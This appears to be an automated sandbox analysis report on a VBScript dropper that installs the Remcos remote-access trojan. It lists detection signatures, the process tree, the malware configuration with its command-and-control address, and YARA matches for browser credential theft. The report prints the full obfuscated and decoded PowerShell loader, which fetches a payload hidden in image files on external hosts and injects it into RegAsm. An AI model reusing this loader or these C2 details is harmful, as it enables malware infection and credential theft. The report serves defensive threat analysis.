Edit tour

Windows Analysis Report
scan_doc20241024.vbs

Overview

General Information

Sample name:	scan_doc20241024.vbs
Analysis ID:	1540845
MD5:	87e9c9fa5b677d82e0eba303bfee0768
SHA1:	26c03786558062484c7f275afedea681494c8b7f
SHA256:	af2848711b8c1b41a6315cd18c52158f1c080f462c3d100df9670f5df265daf0
Tags:	RATRemcosRATvbsuser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and load assembly

Sigma detected: Powershell download payload from hardcoded c2 list

Suricata IDS alerts for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected Powershell download and execute

Yara detected Remcos RAT

.NET source code references suspicious native API functions

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after accessing registry keys)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 3308 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 4872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#FM#bQBu#Gk#aQBG#Ek#LwBu#Gk#YQBt#C8#cwBk#GE#ZQBo#C8#cwBm#GU#cg#v#GE#bgBu#C8#QQBL#Ek#UwBF#EE#VwBV#EU#SgBJ#C8#bQBv#GM#LgB0#G4#ZQB0#G4#bwBj#HI#ZQBz#HU#YgB1#Gg#d#Bp#Gc#LgB3#GE#cg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)

RegAsm.exe (PID: 4512 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["154.216.18.51:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JX5AIB", "Keylog flag": "", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x59738:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x59c48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x59618:$str_b2: Executing file: 0x5a01c:$str_b3: GetDirectListeningPort 0x59a38:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x59bb8:$str_b7: \update.vbs 0x59644:$str_b9: Downloaded file: 0x59630:$str_b10: Downloading file: 0x596d4:$str_b12: Failed to upload file: 0x59fe4:$str_b13: StartForward 0x5a004:$str_b14: StopForward 0x59b10:$str_b15: fso.DeleteFile " 0x59aa4:$str_b16: On Error Resume Next 0x59b40:$str_b17: fso.DeleteFolder " 0x596c4:$str_b18: Uploaded file: 0x59684:$str_b19: Unable to delete: 0x59ad8:$str_b20: while fso.FileExists(" 0x59871:$str_c0: [Firefox StoredLogins not found] 0x597a5:$str_c2: [Chrome StoredLogins found, cleared!] 0x59781:$str_c3: [Chrome StoredLogins not found] 0x59898:$str_c6: \logins.json
00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: powershell.exe PID: 4872	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 4872	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2f980:$b2: ::FromBase64String( 0x372da:$b2: ::FromBase64String( 0x2f791:$b3: ::UTF8.GetString( 0x370eb:$b3: ::UTF8.GetString( 0xd297c:$s1: -join 0x10e598:$s1: -join 0x9e15:$s3: reverse 0x1570f:$s3: reverse 0x63e57:$s3: reverse 0x64145:$s3: reverse 0x6485f:$s3: reverse 0x65018:$s3: reverse 0x6c1b3:$s3: reverse 0x6c5cd:$s3: reverse 0x6d155:$s3: reverse 0x6de02:$s3: reverse 0xa9f80:$s3: reverse 0xb0a53:$s3: reverse 0xf4fe5:$s3: reverse 0xfbc24:$s3: reverse 0xfdc6e:$s3: reverse
Process Memory Space: powershell.exe PID: 8	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 8	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: powershell.exe PID: 8	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1c229:$b2: ::FromBase64String( 0x13388a:$b2: ::FromBase64String( 0x1a8559:$b2: ::FromBase64String( 0x1aa14d:$b2: ::FromBase64String( 0x1baef0:$b2: ::FromBase64String( 0x3e81f3:$b2: ::FromBase64String( 0x401481:$b2: ::FromBase64String( 0x1c03a:$b3: ::UTF8.GetString( 0x13369b:$b3: ::UTF8.GetString( 0x1a836a:$b3: ::UTF8.GetString( 0x1a9f5e:$b3: ::UTF8.GetString( 0x1bad01:$b3: ::UTF8.GetString( 0x3e8004:$b3: ::UTF8.GetString( 0x401292:$b3: ::UTF8.GetString( 0x16fb3:$s1: -join 0x2c13f:$s1: -join 0x39214:$s1: -join 0x3c5e6:$s1: -join 0x3cc98:$s1: -join 0x3e789:$s1: -join 0x4098f:$s1: -join
Process Memory Space: RegAsm.exe PID: 4512	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.RegAsm.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x59738:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x59c48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x59618:$str_b2: Executing file: 0x5a01c:$str_b3: GetDirectListeningPort 0x59a38:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x59bb8:$str_b7: \update.vbs 0x59644:$str_b9: Downloaded file: 0x59630:$str_b10: Downloading file: 0x596d4:$str_b12: Failed to upload file: 0x59fe4:$str_b13: StartForward 0x5a004:$str_b14: StopForward 0x59b10:$str_b15: fso.DeleteFile " 0x59aa4:$str_b16: On Error Resume Next 0x59b40:$str_b17: fso.DeleteFolder " 0x596c4:$str_b18: Uploaded file: 0x59684:$str_b19: Unable to delete: 0x59ad8:$str_b20: while fso.FileExists(" 0x59871:$str_c0: [Firefox StoredLogins not found] 0x597a5:$str_c2: [Chrome StoredLogins found, cleared!] 0x59781:$str_c3: [Chrome StoredLogins not found] 0x59898:$str_c6: \logins.json
13.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.RegAsm.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x58338:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x58848:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x58218:$str_b2: Executing file: 0x58c1c:$str_b3: GetDirectListeningPort 0x58638:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x587b8:$str_b7: \update.vbs 0x58244:$str_b9: Downloaded file: 0x58230:$str_b10: Downloading file: 0x582d4:$str_b12: Failed to upload file: 0x58be4:$str_b13: StartForward 0x58c04:$str_b14: StopForward 0x58710:$str_b15: fso.DeleteFile " 0x586a4:$str_b16: On Error Resume Next 0x58740:$str_b17: fso.DeleteFolder " 0x582c4:$str_b18: Uploaded file: 0x58284:$str_b19: Unable to delete: 0x586d8:$str_b20: while fso.FileExists(" 0x58471:$str_c0: [Firefox StoredLogins not found] 0x583a5:$str_c2: [Chrome StoredLogins found, cleared!] 0x58381:$str_c3: [Chrome StoredLogins not found] 0x58498:$str_c6: \logins.json
6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi64_8.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

Spreading

Sigma detected: Powershell download payload from hardcoded c2 list

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k